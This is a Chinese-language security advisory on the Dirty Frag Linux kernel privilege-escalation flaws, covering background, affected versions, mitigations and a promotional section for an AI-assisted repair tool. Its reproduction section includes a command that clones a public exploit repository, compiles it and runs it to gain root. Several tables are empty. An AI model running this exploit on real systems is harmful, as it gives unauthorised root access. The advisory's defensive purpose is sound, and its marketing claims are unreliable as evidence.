0x00 漏洞概述
2026 年 5 月 7 日,韩国安全研究员 Hyunwoo Kim(@v4bel) 在禁令破裂后公开披露了一个被命名为 "Dirty Frag" 的 Linux 内核本地权限提升漏洞链。该漏洞由两个独立的页面缓存写入原语(Page-Cache Write Primitive)组合而成:
| | | |
|---|
| CVE-2026-43284 | | | |
| CVE-2026-43500 | | | |
任何拥有本地 Shell 访问权限的普通用户,均可通过单条命令直接获取 root 权限。漏洞利用具有确定性,不依赖竞态条件,成功率极高。
0x01 漏洞背景
1.1 "Dirty" 系列漏洞家族
Dirty Frag 属于 Linux 内核中一类经典的页面缓存污染漏洞,其前辈包括:
- Dirty COW(CVE-2016-5195):利用写时复制(Copy-on-Write)竞态条件写入只读映射
- Dirty Pipe(CVE-2022-0847):通过
pipe 机制覆写页面缓存中的只读文件 - Copy Fail(CVE-2026-31431):同类页面缓存写入原语的另一变种
Dirty Frag 与上述漏洞同属一个漏洞类别,但作者自述其攻击面聚焦于内核 struct sk_buff 的 frag(分片)成员,故得名 "Dirty Frag"。
1.2 漏洞发现者
Hyunwoo Kim 此前发现过多个 Linux 内核提权漏洞,在内核 namespace 和网络子系统安全研究领域具有丰富经验。本次公开披露时,研究员同步发布了技术写作和 PoC 利用代码。
0x02 漏洞利用特点
与传统内核提权漏洞相比,Dirty Frag 具备以下显著特点:
| | |
|---|
| 确定性 | | |
| 成功率 | | |
| 稳定性 | | |
| 权限要求 | | |
| 利用方式 | | |
| 绕过缓解 | 绕过 Copy Fail(algif_aead 黑名单)缓解 | |
0x03 受影响版本
3.1 内核版本范围
- CVE-2026-43284(ESP):2017 年 1 月引入,覆盖约 9 年的内核版本
- CVE-2026-43500(RxRPC):2023 年 6 月引入,覆盖约 3 年的内核版本
3.2 受影响发行版(已确认)
注:强化容器环境(如启用了默认 seccomp profile 的 Kubernetes Pod)利用难度较高,但虚拟机和配置宽松的容器环境风险依然显著。
0x04 漏洞复现
4.1 使用低权限用户或者创建新的低权限用户
使用系统已有低权限用户或者创建一个新的低权限用户:
useradd -s /bin/bash -m testpasswd test
4.2 执行如下命令复现
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

0x05 缓解措施与防御建议
5.1 临时缓解:禁用受影响内核模块(推荐立即执行)
# 方法一:禁用 esp4、esp6、rxrpc 模块并清理页面缓存sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \ > /etc/modprobe.d/dirtyfrag.conf; \ rmmod esp4 esp6 rxrpc 2>/dev/null; \ echo 3 > /proc/sys/vm/drop_caches; \ true"# 方法二:更新 initramfs(使模块禁用在重启后持久生效)update-initramfs -u # Debian/Ubuntudracut -f # RHEL/Fedora/CentOS# ⚠️ 注意:禁用 esp4/esp6 将中断基于 IPsec 的 VPN 功能# 禁用 rxrpc 将影响 AFS(Andrew File System)挂载
5.2 使用OpenWarp进行批量自动修复(一句话进行修复)
由于 Dirty Frag 漏洞的影响面过广,运维工程师需要在最短时间内登上受影响的生产主机,确认内核版本、卸载 esp4/esp6/rxrpc 模块、推送内核补丁、逐台验证修复结果,这对于运维工程师是一个很大的挑战,我们可以使用OpenWarp 来进行批量执行修复,其将本地 AI 辅助、多目标 SSH 会话管理与可复用的处置 Workflow 集成于同一个终端界面,让运维工程师在高压的应急响应中始终保持清晰的操作节奏。更关键的是,OpenWarp 支持接入本地部署的大模型,目标机器的内核信息、业务配置、命令输出全程不经过任何云端服务器——修漏洞的工具本身,不会成为新的风险敞口,可直接通过访问“https://openwarp.zerx.dev/”进行下载。

1)下载完毕并配置好相关模型后,可直接通过如下提示词让OpenWarp为我们自动进行修复:
请调研Dirty Frag漏洞,执行缓解修复措施,修复Dirty Frag漏洞,需要联网查询最新信息

2)随后OpenWarp会按照提示词指令完成漏洞修复工作,如下图所示:



最后,我们再次通过执行“./exp”命令,进行漏洞验证,发现OpenWarp已为我们成功进行修复,经验证,修复后无法提权。

0x06 总结
Dirty Frag 是近年来 Linux 内核本地权限提升漏洞中影响面最广、利用成本最低的漏洞之一。其核心设计优雅且危险:通过复用 splice(2) 将页面缓存引用注入网络加密路径,利用内核原地解密的"副作用"实现对任意只读文件的隐蔽篡改,最终以确定性方式完成提权。
漏洞在内核中潜伏长达 9 年(ESP 路径),暗示此类网络栈与文件系统交叉边界上的安全问题仍有大量未被充分审计的空间。Dirty Frag 的双路径设计(ESP + RxRPC 互补)确保了对几乎所有主流 Linux 发行版的广泛覆盖,给企业修复工作带来相当压力。
建议各运维团队立即评估内核版本,优先通过禁用受影响模块完成临时缓解,并在补丁可用后第一时间使用OpenWarp进行升级。
参考资料
- Dirty Frag (CVE-2026-43284) Linux Privilege Escalation — Wiz Blog
- RHSB-2026-003 Dirty Frag — Red Hat Customer Portal
- Dirty Frag Linux kernel local privilege escalation vulnerability mitigations — Ubuntu
- Dirty Frag (CVE-2026-43284, CVE-2026-43500) FAQ — Tenable
- Dirty Frag Mitigation and Kernel Update — CloudLinux
- Active attack: Dirty Frag expands post-compromise risk — Microsoft Security Blog
- Linux Kernel Dirty Frag LPE Exploit — The Hacker News
- Dirty Frag Linux 内核提权漏洞安全风险通告 — 安全内参